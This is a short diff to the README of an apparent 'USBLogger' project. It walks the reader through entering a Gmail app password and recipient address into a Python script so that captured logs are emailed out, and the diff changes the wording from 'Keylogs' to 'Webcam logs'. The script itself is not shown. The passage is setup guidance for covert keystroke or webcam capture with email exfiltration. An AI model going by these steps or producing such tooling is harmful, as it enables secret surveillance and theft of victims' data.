rickroll747/USBLogger/README.md

 Step 2: Replace your_app_password With Your Gmail App Password AKA Your Gmail SMTP API Key.

 Step 3 (MOST IMPORTANT PART): Replace recipient_email@gmail.com With Your Gmail Email Address.
-This Part Is Where The Keylogs Get Emailed To.
+This Part Is Where The Webcam logs Get Emailed To.

 Step 4: Save The Python Script.